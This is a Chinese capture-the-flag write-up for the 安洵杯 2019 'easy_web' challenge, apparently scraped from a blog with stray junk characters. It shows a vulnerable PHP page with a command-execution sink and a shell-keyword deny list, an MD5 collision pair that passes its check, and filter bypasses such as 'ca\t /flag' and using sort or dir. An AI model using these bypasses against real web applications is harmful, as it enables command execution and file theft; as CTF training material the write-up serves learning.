[安洵杯 2019]easy_web

admin

, _% T" Z0 ^; @& i: k<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
  r! j$ L0 z1 I6 r! G6 b<p>&nbsp;</p>
! N8 R3 J8 J& n& `9 b<p>&nbsp;</p>
7 ?* m* n, s" ?' p" }<p>&nbsp;题目打开如下，?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=，同时查看源代码</p>
6 f' h) N$ z( P0 j# t1 F# F" o<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
5 X# }8 R( t5 ]! i2 |<p>&nbsp;</p>
9 v/ H, y$ v9 k" Z4 C<p>&nbsp;</p>
1 }2 B: f: G% A% z, n<p>这里有个MD5 is funny，说明这个题目大概率跟MD5有关</p>
<p>然后我抓包了一下，消息头里面没有什么特殊的东西，于是我尝试从url入手</p>
<p>首先把那个进行一次base64位解码</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
" G0 L: E0 {. I$ Q% d  m<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;解码一次以后还是很像base64编码，于是又解码一次</p>
5 f# [4 e' O% g" w& u; g5 q<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
/ w% }* y, ?  Y5 B<p>&nbsp;</p>
9 {6 `1 u7 y9 D5 d) @<p>&nbsp;</p>
<p>&nbsp;然后用hex解码一下得到了</p>
<div class="cnblogs_Highlighter">
* ~5 ]" D5 s. d! z  b<pre class="brush:sql;gutter:true;">555.png
</pre>
. V; q$ A5 p; X& d</div>
<p>　　用同样的方法把index.php进行加密</p>
<div class="cnblogs_Highlighter">
3 ^7 @( E) h+ d3 R<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
4 \- B) V0 ^) E* Y</pre>
7 T, B0 ^9 @* u: T5 s/ B" l, J  _4 I</div>
<p>　　然后输入到地址栏</p>
$ u3 v1 D5 @3 I8 P5 K! b<p>&nbsp;然后查看源代码，把源代码里面的那一串base64的编码解码</p>
<div class="cnblogs_code">
- P! E8 a& y/ J- Q; V* F3 s<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
1 C6 {& H. L* a7 h; _</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
' j- `# V; e2 X/ o</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);
0 ?5 `0 f3 Y, Z</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));
) c6 [5 P3 l5 i0 y8 d, Y' z2 z: ?
7 ]$ F6 y( \% L</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;
( P  p" j  t6 F% q" X& d& z    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi～ no flag"<span style="color: rgba(0, 0, 0, 1)">);
) x; m( _# v: e% b$ Z" i} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
& p! b9 {: A, k! x6 n: j( D4 @: {    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
3 _& n* I* @2 ?8 J9 u    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;
/ b& a% @. f" t# S) X    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
  z# M% ]: Q* L  J}
1 g! k- ^' M6 z. R1 y</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
+ R2 G  m% U0 i* u</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
0 R7 k9 t; P' `. ]) m    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
: v5 C) f- g2 f; F% o    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
8 P- ?# Q6 M! y( @8 e        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
/ w9 \$ J. g3 c+ G0 k        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
    }
: a: f! y8 n6 Z0 v/ G: U& G}
: h6 e) x- ~7 e0 S9 k
</span>?&gt;
&lt;html&gt;
&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
$ u3 U1 F! K) m; t0 {% \  body{
   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
$ l, S  T0 q( R! Q) g. D$ W. D   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
9 W# n" a% X9 s% e<span style="color: rgba(0, 0, 0, 1)">}
</span>&lt;/style&gt;
&lt;body&gt;
) t* }$ W8 D  {. H1 G2 ?* Z&lt;/body&gt;
&lt;/html&gt;</pre>
</div>
<p>结合前面的推断，关键代码就在</p>
<div class="cnblogs_code">
- q2 s% j. n# @) e% \<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
3 W& ]- G" e0 g1 f: v        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
    }</span></pre>
; g/ V- [" h2 Y# y$ I2 i9 K</div>
<p>这种MD5是md5强碰撞</p>
<div class="cnblogs_Highlighter">
2 F  Y$ A# [) A' i<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
3 x+ o* o# N: T- x! _</pre>
) W( M7 j  n3 x2 q4 [1 t  X7 Y</div>
<div class="cnblogs_Highlighter">
1 O( [2 z3 t' W  Z8 G<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
+ ^8 p" L) o( C3 b* p1 J</pre>
</div>
3 m) J8 F( [/ V/ w& x$ t<p>　　只需要这样就可以把cmd里面的当成命令来处理。</p>
1 Z# c* G/ I9 t! }0 ^0 @<p>于是采用payload:</p>
; q! N2 V: @- ?( I& i" x+ w8 @8 X<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>&nbsp;</p>
1 H1 l' L/ w, U* q  q/ E6 h<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
+ z7 [; v4 w# U; o& D, @, l+ M: `<p>ls和l\s在命令执行的时候结果是一样的。</p>
: k4 z; O9 J' _& r5 m<p>然后发现根目录里面有/flag</p>
, c' s! b: p3 b$ s# c  U<p>于是payload:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
</pre>
</div>
<p>　　对于这个题目，因为他没有屏蔽sort和dir</p>
8 f. q6 e- [8 T7 k% z<p>所以查看也可以用dir来代替ls，cat可以用sort来代替。</p>
" D7 B; y4 x5 X8 F, o+ }<p>&nbsp;</p>